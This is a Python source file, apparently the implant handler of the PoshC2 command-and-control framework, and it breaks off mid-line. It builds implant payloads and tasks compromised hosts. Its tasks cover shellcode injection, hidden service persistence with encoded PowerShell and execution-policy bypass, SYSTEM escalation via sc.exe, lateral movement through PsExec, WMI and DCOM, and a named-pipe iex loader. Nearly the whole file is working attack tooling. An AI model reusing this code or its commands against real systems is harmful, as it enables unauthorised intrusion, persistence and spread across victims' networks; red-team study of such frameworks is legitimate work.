#!/usr/bin/python import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal import datetime from datetime import datetime, timedelta from sqlite3 import Error from Help import * from AutoLoads import * from DB import * from Colours import * from Config import * from HTML import * from TabComplete import * from Payloads import * from Core import * def catch_exit(signum, frame): sys.exit(0) def createproxypayload(): proxyuser = raw_input("Proxy User: e.g. Domain\\user ") proxypass = raw_input("Proxy Password: e.g. Password1 ") proxyurl = raw_input("Proxy URL: .e.g. ") credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") update_item("ProxyURL", "C2Server", proxyurl) update_item("ProxyUser", "C2Server", proxyuser) update_item("ProxyPass", "C2Server", proxypass) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) newPayload.CreateRaw("Proxy") newPayload.CreateDlls("Proxy") newPayload.CreateShellcode("Proxy") newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire ) startup("Created new proxy payloads") def createdaisypayload(): name = raw_input("Daisy name: e.g. DC1 ") domain = raw_input("Domain or URL: https://www.example.com ") daisyurl = raw_input("Daisy host: .e.g. ") daisyport = raw_input("Daisy port: .e.g. 8888 ") daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", "", proxynone, C2[19], C2[20], C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" ) startup("Created new %s daisy payloads" % name) def createnewpayload(): domain = raw_input("Domain or URL: https://www.example.com ") domainbase = (domain.lower()).replace('https://','') domainbase = domainbase.replace('http://','') domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") proxyurl = raw_input("Proxy URL: .e.g. ") randomid = randomuri(5) proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: proxyuser = raw_input("Proxy User: e.g. Domain\\user ") proxypass = raw_input("Proxy Password: e.g. Password1 ") credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() domainbase = "Proxy%s%s" % (domainbase,randomid) else: domainbase = "%s%s" % (randomid,domainbase) imurl = get_newimplanturl() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, proxypass, proxyurl, "", "", C2[19], C2[20], C2[21], imurl, PayloadsDirectory) newPayload.CreateRaw("%s_" % domainbase) newPayload.CreateDlls("%s_" % domainbase) newPayload.CreateShellcode("%s_" % domainbase) newPayload.CreateEXE("%s_" % domainbase) newPayload.CreateMsbuild("%s_" % domainbase) newPayload.CreatePython("%s_" % domainbase) new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire ) startup("Created new payloads") def argp(cmd): args = "" try: parser = argparse.ArgumentParser(add_help=False) parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False) parser.add_argument('-Source', '-source', action='store', dest='source', required=True) parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True) parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False) args, unknown = parser.parse_known_args(shlex.split(cmd)) except: error = "error" return args def filecomplete(text, state): os.chdir(PayloadsDirectory) return (glob.glob(text+'*')+[None])[state] def complete(text, state): for cmd in COMMANDS: if cmd.startswith(text): if not state: return cmd else: state -= 1 def load_file( location ): fr = None try: file = open((location), "rb") fr = file.read() except Exception as e: print ("Error loading file %s" % e) if fr: return fr else: return None def migrate(randomuri, params=""): implant = get_implantdetails(randomuri) implant_arch = implant[10] implant_comms = implant[15] if implant_arch == "AMD64": arch = "64" else: arch = "86" if implant_comms == "Normal": shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch)) elif implant_comms == "Daisy": daisyname = raw_input("Name required: ") shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch)) elif implant_comms == "Proxy": shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch)) check_module_loaded("Inject-Shellcode.ps1", randomuri) new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) def startup(printhelp = ""): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except Exception as e: print ("cls") print (chr(27) + "[2J") print (Colours.GREEN + "") print (logopic) print (Colours.END + "") try: ii = get_implants() if ii: for i in ii: ID = i[0] RandomURI = i[1] LastSeen = i[7] Hostname = i[3] DomainUser = i[2] Arch = i[10] PID = i[8] Pivot = i[15] Sleep = i[13] Label = i[16] if Pivot == "Daisy": Pivot = "D" elif Pivot == "C#": Pivot = "C#" elif Pivot == "Proxy": Pivot = "P" elif Pivot == "Python": Pivot = "PY" else: Pivot = "PS" from datetime import datetime, timedelta LastSeenTime = datetime.strptime(LastSeen,"%m/%d/%Y %H:%M:%S") now = datetime.now() nowplus10 = now - timedelta(minutes=10) nowplus60 = now - timedelta(minutes=59) sID = "["+str(ID)+"]" if Label == None: sLabel = "" else: sLabel = "["+Label+"]" if nowplus60 > LastSeenTime: print (Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot)) elif nowplus10 > LastSeenTime: print (Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot)) else: print (Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, DomainUser, Hostname, Arch, Pivot)) else: from datetime import datetime, timedelta now = datetime.now() print (Colours.RED+"No Implants as of: %s" % now.strftime("%m/%d/%Y %H:%M:%S")) print (Colours.END+"") if printhelp: print (printhelp) t = tabCompleter() t.createListCompleter(PRECOMMANDS) readline.set_completer_delims('\t') readline.parse_and_bind("tab: complete") readline.set_completer(t.listCompleter) history = get_history_dict() if history: for command in history: try: readline.add_history(command[1]) except: pass implant_id = raw_input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ") print ("") if implant_id: try: last = get_lastcommand() if last: if last != implant_id: new_commandhistory(implant_id) else: new_commandhistory(implant_id) except Exception as e: ExError = e if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"): startup() if "output-to-html" in implant_id.lower(): generate_table("CompletedTasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") graphviz() time.sleep(1) startup() if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()): urls = get_c2urls() urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" for i in urls: urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]) startup(urlformatted) if "add-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("add-autorun ","") autorun = autorun.replace("add-autorun","") add_autorun(autorun) startup("add-autorun: %s\r\n" % autorun) if "list-autorun" in implant_id.lower(): autoruns = get_autorun() startup(autoruns) if "del-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("del-autorun ","") del_autorun(autorun) startup("deleted autorun\r\n") if "nuke-autorun" in implant_id.lower(): del_autoruns() startup("nuked autoruns\r\n") if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"): startup("automigrate not currently implemented for the Python version of PoshC2\r\n") if "show-serverinfo" in implant_id.lower(): i = get_c2server_all() detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24]) startup(detailsformatted) if "turnoff-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "No") startup("Turned off notifications on new implant") if "turnon-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "Yes") startup("Turned on notifications on new implant") if "set-clockworksmsapikey" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","") cmd = cmd.replace("set-clockworksmsapikey","") update_item("MobileNumber", "C2Server", cmd) startup("Updated set-clockworksmsapikey: %s\r\n" % cmd) if "set-clockworksmsnumber" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","") cmd = cmd.replace("set-clockworksmsnumber","") update_item("APIKEY", "C2Server", cmd) startup("Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) if "set-defaultbeacon" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-defaultbeacon ","") cmd = cmd.replace("set-defaultbeacon","") update_item("DefaultSleep", "C2Server", cmd) startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() comtasks = get_completedtasks() hosts = "" uploads = "" urls = "" users = "" for i in implants: if i[3] not in hosts: hosts += "%s \n" % i[3] if i[9] not in urls: urls += "%s \n" % i[9] for t in comtasks: hostname = get_implantdetails(t[2]) if hostname[2] not in users: users += "%s \n" % hostname[2] if "Upload-File" in t[3]: uploadedfile = t[3] uploadedfile = uploadedfile.partition("estination ")[2] uploadedfile = uploadedfile.partition(" -Base64")[0] uploads += "%s %s \n" % (hostname[3], uploadedfile) if "Installing persistence" in t[4]: hostname = get_implantdetails(t[2]) line = t[4].replace('\n','') line = line.replace('\r','') filenameuploaded = line.rstrip().split(":",1)[1] uploads += "%s %s \n" % (hostname[3], filenameuploaded) startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads)) if "listmodules" in implant_id.lower(): mods = "" for modname in os.listdir("%s/Modules/" % POSHDIR): mods += "%s\r\n" % modname startup(mods) if "creds" in implant_id.lower(): startup("creds module not implemented yet") if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"): startup("Cannot pwnself on Unix :)\r\n") if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "): alltasks = "" tasks = get_nettasks_all() if tasks is None: startup("No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2]) startup("Queued tasks:\r\n\r\n%s" % alltasks) if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "): drop_nettasks() startup("Empty tasks queue\r\n") if "quit" in implant_id.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup() if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) if "createdaisypayload" in implant_id.lower(): createdaisypayload() if "createproxypayload" in implant_id.lower(): createproxypayload() if "createnewpayload" in implant_id.lower(): createnewpayload() if (implant_id == "?") or (implant_id == "help"): startup(pre_help) if (implant_id.lower() == "history") or implant_id.lower() == "history ": startup(get_history()) if "use " in implant_id.lower(): implant_id = implant_id.replace("use ","") params = re.compile("use ", re.IGNORECASE) implant_id = params.sub("", implant_id) commandloop(implant_id) except Exception as e: if 'unable to open database file' in e: startup() else: traceback.print_exc() print ("Error: %s" % e) print ("Currently no valid implants: sleeping for 10 seconds") time.sleep(10) startup() def runcommand(command, randomuri): if command: try: last = get_lastcommand() if last: if last != command: new_commandhistory(command) else: new_commandhistory(command) except Exception as e: ExError = e implant_type = get_implanttype(randomuri) if implant_type == "OSX": if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') try: if "s" in command: command = command.replace('s', '') if "h" in command: command = command.replace('h', '') command = (int(command)) * 60 command = (int(command)) * 60 if "m" in command: command = command.replace('m', '') command = (int(command)) * 60 except Exception as e: print ("Error setting beacon: %s" % e) sleep = '$sleeptime = %s' % command update_sleep(command, randomuri) new_task(sleep, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup() elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") import string helpfull = string.split(py_help1, '\n') for line in helpfull: if searchterm in line: print (line) elif "unhide-implant" in command.lower(): unhide_implant(randomuri) elif "hide-implant" in command.lower(): kill_implant(randomuri) elif command.lower() == 'sai' or command.lower() == 'sai ': new_task('startanotherimplant', randomuri) elif "upload-file" in command.lower(): source = "" destination = "" s = "" args = argp(command) try: if args: with open(args.source, "rb") as source_file: s = source_file.read() source = base64.b64encode(s) if s: destination = args.destination.replace("\\","\\\\") print ("") print ("Uploading %s to %s" % (args.source, destination)) uploadcommand = "upload-file \"%s\":%s" % (destination, source) new_task(uploadcommand, randomuri) except Exception as e: print ("Error with source file: %s" % e ) traceback.print_exc() elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (py_help1) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri) elif 'get-screenshot' in command.lower(): taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s" new_task(taskcmd, randomuri) elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print ("Implant not terminated") if ri == "": pid = get_pid(randomuri) new_task("kill -9 %s" % pid,randomuri) kill_implant(randomuri) if ri.lower() == "y": pid = get_pid(randomuri) new_task("kill -9 %s" % pid,randomuri) kill_implant(randomuri) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): startup() else: if command: new_task(command, randomuri) return elif implant_type == "C#": try: check_module_loaded("Core.exe", randomuri) except Exception as e: print ("Error loading Core.exe: %s" % e) if "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") import string helpfull = string.split(sharp_help1, '\n') for line in helpfull: if searchterm in line: print (line) elif "upload-file" in command.lower(): source = "" destination = "" s = "" args = argp(command) try: if args: with open(args.source, "rb") as source_file: s = source_file.read() source = base64.b64encode(s) if s: destination = args.destination.replace("\\","\\\\") print ("") print ("Uploading %s to %s" % (args.source, destination)) if (args.nothidden): uploadcommand = "upload-file%s;\"%s\"" % (source, destination) else: uploadcommand = "upload-file%s;\"%s\"" % (source, destination) new_task(uploadcommand, randomuri) except Exception as e: print ("Error with source file: %s" % e) traceback.print_exc() elif "unhide-implant" in command.lower(): unhide_implant(randomuri) elif "hide-implant" in command.lower(): kill_implant(randomuri) elif "inject-shellcode" in command.lower(): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) readline.set_completer(filecomplete) path = raw_input("Location of shellcode file: ") t = tabCompleter() t.createListCompleter(COMMANDS) readline.set_completer(t.listCompleter) try: shellcodefile = load_file(path) if shellcodefile != None: arch = "64" new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), randomuri) except Exception as e: print ("Error loading file: %s" % e) elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print ("Implant not terminated") if ri == "": pid = get_pid(randomuri) new_task("exit",randomuri) kill_implant(randomuri) if ri.lower() == "y": pid = get_pid(randomuri) new_task("exit" % pid,randomuri) kill_implant(randomuri) elif "seatbelt " in command.lower(): check_module_loaded("Seatbelt.exe", randomuri) new_task(command,randomuri) elif (command.lower().startswith("get-screenshot")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("arpscan")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("testadcredential")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("testlocalcredential")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("turtle")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("get-content")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("resolvednsname")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("resolveip")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("cred-popper")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("get-serviceperms")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("move")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("delete")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower().startswith("ls")): new_task("run-exe Core.Program Core %s" % command,randomuri) elif (command.lower() == "pwd") or (command.lower() == "pwd "): new_task("run-exe Core.Program Core pwd",randomuri) elif (command.lower() == "ps") or (command.lower() == "ps "): new_task("run-exe Core.Program Core Get-ProcessList",randomuri) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri) elif "listmodules" in command.lower(): modules = os.listdir("%s/Modules/" % POSHDIR) print ("") print ("[+] Available modules:") print ("") for mod in modules: if (".exe" in mod) or (".dll" in mod) : print (mod) new_task(command,randomuri) elif "modulesloaded" in command.lower(): ml = get_implantdetails(randomuri) print (ml[14]) elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (sharp_help1) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): startup() elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): new_task(command, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') update_sleep(command, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup() else: if command: new_task(command, randomuri) return else: try: check_module_loaded("Implant-Core.ps1", randomuri) except Exception as e: print ("Error loading Implant-Core.ps1: %s" % e) run_autoloads(command, randomuri) if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): new_task(command, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') update_sleep(command, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup() elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") import string helpfull = string.split(posh_help, '\n') for line in helpfull: if searchterm in line: print (line) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): startup() elif "install-servicelevel-persistencewithproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": startup("Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, randomuri) elif "install-servicelevel-persistence" in command.lower(): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, randomuri) elif "remove-servicelevel-persistence" in command.lower(): new_task("sc.exe delete CPUpdater", randomuri) # psexec lateral movement elif "get-implantworkingdirectory" in command.lower(): new_task("pwd", randomuri) elif "get-system-withproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": startup("Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, randomuri) elif "get-system-withdaisy" in command.lower(): C2 = get_c2server_all() daisyname = raw_input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, randomuri) elif "get-system" in command.lower(): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, randomuri) elif "quit" in command.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup() if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) elif "invoke-psexecproxypayload" in command.lower(): check_module_loaded("Invoke-PsExec.ps1", randomuri) C2 = get_c2server_all() if C2[11] == "": startup("Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) new_task(cmd, randomuri) elif "invoke-psexecdaisypayload" in command.lower(): check_module_loaded("Invoke-PsExec.ps1", randomuri) daisyname = raw_input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload) new_task(cmd, randomuri) else: startup("Need to run createdaisypayload first") elif "invoke-psexecpayload" in command.lower(): check_module_loaded("Invoke-PsExec.ps1", randomuri) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) new_task(cmd, randomuri) # wmi lateral movement elif "invoke-wmiproxypayload" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri) C2 = get_c2server_all() if C2[11] == "": startup("Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) new_task(cmd, randomuri) elif "invoke-wmidaisypayload" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri) daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload) new_task(cmd, randomuri) else: startup("Need to run createdaisypayload first") elif "invoke-wmipayload" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) new_task(cmd, randomuri) # dcom lateral movement elif "invoke-dcomproxypayload" in command.lower(): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, randomuri) elif "invoke-dcomdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, randomuri) else: startup("Need to run createdaisypayload first") elif "invoke-dcompayload" in command.lower(): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, randomuri) # runas payloads elif "invoke-runasdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() new_task("$proxypayload = \"%s\"" % payload, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri) check_module_loaded("NamedPipeDaisy.ps1", randomuri) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) new_task(pscommand, randomuri) else: startup("Need to run createdaisypayload first") elif "invoke-runasproxypayload" in command.lower(): C2 = get_c2server_all() if C2[11] == "": startup("Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], 